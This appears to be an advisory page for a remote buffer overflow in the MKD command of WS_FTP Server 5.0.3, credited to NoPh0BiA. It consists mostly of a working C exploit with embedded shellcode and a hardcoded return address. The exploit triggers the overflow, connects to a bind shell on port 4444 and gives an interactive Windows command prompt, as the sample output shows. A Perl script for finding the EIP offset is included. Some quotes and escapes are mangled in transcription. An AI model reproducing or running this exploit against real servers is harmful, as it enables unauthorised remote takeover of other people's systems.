‘WS_FTP Server MKD Buffer Overflow (Exploit)’
Summary
‘WS_FTP Server is ‘a high-powered, easy-to-use FTP (File Transfer Protocol) server for Windows NT/2000. It allows you to securely share files and folders with customers, vendors, colleagues, and others over the Internet’.
Credit:
‘The information has been provided by NoPh0BiA.’
Details
‘Vulnerable Systems:
* WS_FTP Server version 5.0.3
Exploit:
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo 🙂
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>
#define PORT 21
#define RPORT 4444
#define RET ‘x53x9Bx2Ex7C’ /*win2k sp4*/
char shellcode[]=
‘xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe’
‘x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7’
‘xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb’
‘xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e’
‘x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a’
‘xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb’
‘xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea’
‘x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad’
‘x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30’
‘x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21’
‘xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15’
‘xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6’
‘xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38’
‘x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8’
‘x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1’
‘xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2’
‘xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6’
‘x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1’
‘x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36’
‘x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0’
‘x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1’
‘xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9’
‘xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c’
‘x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4’
‘xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d’;
struct sockaddr_in hrm;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf (‘Connection closed.n’);
exit(EXIT_FAILURE);
} else if (n < 0) {
perror(‘read remote’);
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror (‘read user’);
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip,int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_addr.s_addr = inet_addr(ip);
hrm.sin_port = htons(p);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0)
{
perror(‘connect’);
exit(0);
}
printf(‘[x] Connected to: %s on port %d.n’,ip,p);
return sockfd;
}
int main(int argc, char *argv[])
{
printf(‘***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***n’);
if(argc<4)
{
fprintf(stderr,’Usage: IP USER PASSn’);
exit(0);
}
char *buffer=malloc(954),*A=malloc(519),*B=malloc(32),*target=argv[1],*user=malloc(32),*pass=malloc(32),*request=malloc(32);
int x,y;
memset(request,’�’,32);
memset(user,’�’,32);
memset(pass,’�’,32);
memset(buffer,’�’,954);
memset(A,0x41,519);
memset(B,0x42,32);
strcpy(user,argv[2]);
strcpy(pass,argv[3]);
strcat(buffer,A);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
sprintf(request,’USER %srnPASS %srn’,user,pass);
x = conn(target,PORT);
printf(‘[x] Sending Login..’);
write(x,request,strlen(request));
printf(‘done.n’);
sleep(2);
printf(‘[x] Sending bad code..’);
write(x,’MKD ‘,4);
write(x,buffer,954);
write(x,’rn’,2);
printf(‘done.n’);
sleep(2);
close(x);
printf(‘[x] Checking if exploitation was successful..n’);
y=conn(target,RPORT);
printf(‘[x] 0wn3d!nn’);
shell(y);
close(y);
}
Helper script:
The following Perl script can be used to find the coordinates for A and B so that the RET address affects the EIP and the shellcode is executed.
#!/usr/bin/perl
# WS_FTP RET Address finder
# Noam Rathaus of Beyond Security Ltd.
#
use strict;
use IO::Socket::INET;
usage() unless (@ARGV >= 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
my $socket = IO::Socket::INET->new(proto=>’tcp’, PeerAddr=>$host, PeerPort=>$port);
$socket or die ‘Cannot connect to the host.n’;
$socket->autoflush(1);
while (<$socket>)
{
print $_;
if (/220 /)
{
last;
}
}
print $socket ‘USER noamn’;
while (<$socket>)
{
print $_;
if (/331 /)
{
last;
}
}
print $socket ‘PASS passwordn’;
while (<$socket>)
{
print $_;
if (/230 /)
{
last;
}
}
my $RET = 4;
my $size = 2000;
my $presize = shift(@ARGV) || 200;
my $postsize = shift(@ARGV) || 800;
print $socket ‘MKD ‘.(‘A’x$presize).’DEEF’.(‘B’x($size – $presize – $postsize – $RET)).(‘C’x$postsize).’n’;
while (<$socket>)
{
print $_;
}
print ‘Done.n’;
close($socket);
exit(0);
sub usage
{
print ‘nws_ftp.pl MKD aligment assistantn’;
print ‘nUsage: ws_ftp.pl [host] [port] [pre] [post]n’;
print ‘We generate something of the sorts of ‘A’xpre ‘DEEF’ ‘B’x(2000-pre-post-4) ‘C’xpost.n’;
print ‘You need to align your pre and post so that the EIP is DEEF 0x44454546n’;
print ‘n’;
exit(1);
}’